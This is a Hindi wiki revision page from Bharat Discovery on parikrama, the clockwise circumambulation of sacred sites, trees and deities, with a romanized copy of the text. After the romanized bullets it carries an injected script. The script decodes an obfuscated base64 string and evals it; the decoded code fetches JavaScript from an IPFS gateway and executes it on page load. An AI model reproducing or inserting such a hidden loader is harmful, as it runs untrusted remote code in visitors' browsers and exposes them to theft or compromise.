Difference between revisions of "परिक्रमा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
Line 1: Line 1:
'''सामान्य स्थान या व्यक्ति के चारों ओर उसकी दाहिनी तरफ़ से घूमना।''' इसको प्रदक्षिणा करना भी कहते हैं, जो षोडशोपचार पूजा का एक अंग है। प्राय: सोमवती [[अमावास्या]] को महिलाएँ पीपल वृक्ष की '''108 परिक्रमाएँ''' करती हैं। इसी प्रकार [[दुर्गा]] देवी की परिक्रमा की जाती है। पवित्र धर्मस्थानों, [[अयोध्या]], [[मथुरा]] आदि पुण्यपुरियों की पंचकोशी (25 कोस की), [[ब्रज]] में [[गोवर्धन पूजा]] की सप्तकोसी, ब्रह्ममंडल की चौरासी [[कोसी]], [[नर्मदा नदी|नर्मदा]] जी की अमरकंटक से समुद्र तक छ:मासी और समस्त [[भारत]] खण्ड की वर्षों में पूरी होने वाली - इस प्रकार की विविध '''परिक्रमाएँ''' भूमि में पद-पद पर दण्डवत् लेटकर पूरी की जाती है। यही 108-108 बार प्रति पद पर आवृत्ति करके वर्षों में समाप्त होती है।  
+
*सामान्य स्थान या व्यक्ति के चारों ओर उसकी दाहिनी तरफ़ से घूमने को परिक्रमा कहते हैं।
 +
*इसको प्रदक्षिणा करना भी कहते हैं, जो षोडशोपचार पूजा का एक अंग है।  
 +
*प्राय: सोमवती [[अमावास्या]] को महिलाएँ पीपल वृक्ष की '''108 परिक्रमाएँ''' करती हैं।  
 +
*इसी प्रकार [[दुर्गा]] देवी की परिक्रमा की जाती है।  
 +
*पवित्र धर्मस्थानों, [[अयोध्या]], [[मथुरा]] आदि पुण्यपुरियों की पंचकोशी (25 कोस की), [[ब्रज]] में [[गोवर्धन पूजा]] की सप्तकोसी, ब्रह्ममंडल की चौरासी [[कोसी]], [[नर्मदा नदी|नर्मदा]] जी की अमरकंटक से समुद्र तक छ:मासी और समस्त [[भारत]] खण्ड की वर्षों में पूरी होने वाली - इस प्रकार की विविध '''परिक्रमाएँ''' भूमि में पद-पद पर दण्डवत लेटकर पूरी की जाती है। यही 108-108 बार प्रति पद पर आवृत्ति करके वर्षों में समाप्त होती है।  
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 12:22, 17 January 2011

  • samany sthan ya vyakti ke charoan or usaki dahini taraf se ghoomane ko parikrama kahate haian.
  • isako pradakshina karana bhi kahate haian, jo shodashopachar pooja ka ek aang hai.
  • pray: somavati amavasya ko mahilaean pipal vriksh ki 108 parikramaean karati haian.
  • isi prakar durga devi ki parikrama ki jati hai.
  • pavitr dharmasthanoan, ayodhya, mathura adi punyapuriyoan ki panchakoshi (25 kos ki), braj mean govardhan pooja ki saptakosi, brahmamandal ki chaurasi kosi, narmada ji ki amarakantak se samudr tak chh:masi aur samast bharat khand ki varshoan mean poori hone vali - is prakar ki vividh parikramaean bhoomi mean pad-pad par dandavat letakar poori ki jati hai. yahi 108-108 bar prati pad par avritti karake varshoan mean samapt hoti hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh